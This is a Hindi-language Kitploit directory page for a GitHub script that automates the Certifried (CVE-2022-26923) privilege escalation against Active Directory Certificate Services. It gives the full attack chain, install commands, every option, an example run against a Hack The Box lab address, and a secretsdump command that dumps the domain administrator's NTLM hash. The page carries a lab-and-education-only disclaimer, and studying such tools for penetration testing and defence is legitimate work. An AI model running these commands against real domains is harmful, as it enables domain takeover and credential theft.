Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26923 — CVE-2022-26923 का शोषण | Kitploit
उपकरण/GitHubGitHub/eliasdekiniweek/cve-2022-26923
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारेड टीमिंग
GitHubeliasdekiniweek/cve-2022-26923

CVE-2022-26923

CVE-2022-26923 का शोषण

1456 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2022-26923 – Certifried Exploit (AD CS Abuse)

CVE-2022-26923 (Certifried) के शोषण का स्वचालन, जो Active Directory Certificate Services (AD CS) और Resource-Based Constrained Delegation (RBCD) के दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि की अनुमति देता है, जिसके परिणामस्वरूप डोमेन व्यवस्थापक खाते के NTLM हैश को डंप किया जाता है।

⚠️ केवल शैक्षिक उपयोग / लैब / HTB

अधिकृत वातावरण के बाहर उपयोग न करें।


🎯 विवरण

यह स्क्रिप्ट निम्नलिखित आक्रमण श्रृंखला को स्वचालित करती है:

  1. एक नियंत्रित मशीन खाता बनाना
  2. dNSHostName को संशोधित करना
  3. AD CS के माध्यम से प्रमाणपत्र का अनुरोध करना
  4. प्रमाणपत्र द्वारा प्रमाणीकरण
  5. RBCD का दुरुपयोग
  6. S4U2Self + S4U2Proxy
  7. administrator के लिए Kerberos टिकट प्राप्त करना
  8. secretsdump.py के माध्यम से NTLM डंप

🔗 भेद्यता

  • CVE-2022-26923 – "Certifried"
  • AD CS का उपयोग करने वाले Active Directory परिवेशों को प्रभावित करता है
  • गलत तरीके से जारी प्रमाणपत्र के माध्यम से Domain Controller की पहचान चुराने की अनुमति देता है

🛠 उपयोग किए गए उपकरण

  • certipy-ad
  • bloodyAD
  • getST.py (Impacket)
  • secretsdump.py (Impacket)
  • openssl

📦 निर्भरताओं की स्थापना

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 उपयोग

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

उपलब्ध विकल्प

root@kitploit:~
-d, --dc-ip          Domain Controller का IP
-D, --domain         डोमेन का नाम
-u, --user           वैध उपयोगकर्ता
-p, --pass           उपयोगकर्ता पासवर्ड
-c, --comp-name      नियंत्रित मशीन का नाम
-C, --comp-pass      मशीन पासवर्ड
-a, --ca-name        Certificate Authority का नाम
-t, --template       प्रमाणपत्र टेम्पलेट
-f, --pfx-file       PFX फ़ाइल का नाम
-H, --dc-hostname    DC का होस्टनाम
-A, --dc-account     DC खाता
-i, --impersonate    नकल करने का लक्ष्य खाता
--verbose            डीबग मोड
-h, --help           सहायता

🧠 उदाहरण (HTB Certified)

root@kitploit:~
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose

🔥 अपेक्षित परिणाम

निष्पादन के अंत में:

  • एक Kerberos टिकट administrator.ccache
  • administrator खाते का NTLM डंप

Kerberos समस्या की स्थिति में:

root@kitploit:~
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39

🧬 आंतरिक कार्यप्रणाली

root@kitploit:~
Machine Account Creation
        ↓
dNSHostName spoofing
        ↓
Certificate Request (Machine Template)
        ↓
Authentication via PFX
        ↓
RBCD abuse (bloodyAD)
        ↓
S4U2Self + S4U2Proxy
        ↓
Kerberos Ticket extraction
        ↓
NTLM dump via secretsdump

⚠️ अस्वीकरण

यह परियोजना निम्नलिखित उद्देश्यों के लिए प्रदान की गई है:

  • शैक्षिक
  • सुरक्षा अनुसंधान
  • व्यक्तिगत लैब
  • CTF / HTB

लेखक अनधिकृत उपयोग के लिए कोई जिम्मेदारी नहीं लेता है।


📜 लाइसेंस

MIT

टूल डाउनलोड करें